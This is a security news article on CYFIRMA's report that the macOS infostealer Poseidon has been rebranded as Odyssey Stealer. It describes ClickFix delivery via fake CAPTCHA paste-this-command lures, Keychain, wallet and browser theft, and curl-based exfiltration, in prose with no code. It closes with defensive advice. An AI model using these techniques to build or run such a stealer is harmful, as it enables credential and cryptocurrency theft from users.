MacOS malware Poseidon Stealer rebranded as Odyssey Stealer

The macOS-targeting Poseidon Stealer is believed to have been rebranded as Odyssey Stealer, CYFIRMA reported Thursday.

The Poseidon malware-as-a-service (MaaS) was previously spread through Google Ads in a malvertising campaign reported by Malwarebytes in June 2024.

Now, Odyssey Stealer, attributed to Poseidon creator and AMOS Stealer co-author “Rodrigo,” is being distributed via ClickFix campaigns on spoofed finance, cryptocurrency news and Apple App Store websites, according to CYFIRMA.

The ClickFix method leverages fake Cloudflare CAPTCHA prompts that instruct users to copy and paste a Base64-encoded command into the Mac Terminal to prove they are not a robot. This command fetches an osascript command that executes the malicious Odyssey AppleScript.

Upon execution, Odyssey displays a prompt requesting the user’s device password in an attempt to help retrieve decrypted credentials from the Keychain service.

The infostealer targets Keychain, cryptocurrency wallet applications like Electrum, Coinomi and Exodus, and browsers including Safari, Chrome and Firefox.

Pilfered browser data includes saved passwords and payment information, browsing history, autofill data, details from cryptocurrency and authentication-related plugins, and browser session cookies that can be used to hijack account sessions.

Odyssey also snatches files from the Desktop and Documents folder that have the following extensions: .txt, .pdf, .docx, .jpg, .png, .rtf and .kdbx.

Stolen data is copied to temporary directory created by the malware called /tmp/lovemrtrump and compressed into an archive called out.zip before exfiltration. The archive is then sent to the attacker’s server via a curl POST request with up to 10 additional requests made every 60 seconds if the initial upload fails.

The stolen data is sent with headers that help the attacker track their victims by username and cid, as well as malware buildid.

CYFIRMA uncovered details about the Odyssey Stealer control panel, which allows users to view and manage their infected devices, stolen data logs and custom malware versions. The panel includes a “Google Cookies Restore” section for hijacking browser sessions using stolen cookies, a “Guest Mode” for prospective buyers of the Odyssey MaaS to trial some features, and a dashboard for viewing attack statistics.

Most of the Odyssey Stealer panels discovered by CYFIRMA were noted to be based in Russia.

Odyssey Stealer and Poseidon Staler both share origins with AMOS Stealer, also known as Atomic Stealer, which is run as a separate macOS MaaS operation by a threat actor known as “ping3r.” AMOS Stealer was noted to be spread using the ClickFix method in another campaign reported earlier this month, highlighting the social engineering method’s growing popularity.

The creation of Odyssey Stealer was also attributed to Rodrigo by Moonlock Lab, who found the infostealer being distributed through fake Ledger Live apps last month.

CYFIRMA published indicators of compromise (IoCs) for the latest campaign and recommends organizations take measures to defend against Odyssey and similar malware by blocking osascript execution unless necessary for business operations, employing application whitelisting, using real-time and behavior-based monitoring to detect and respond to intrusions and block outbound communication to known malicious IP addresses and domains.

Mac users are also advised to be aware of sites impersonating app stores and only install applications from the official Mac App Store or verified developer sites.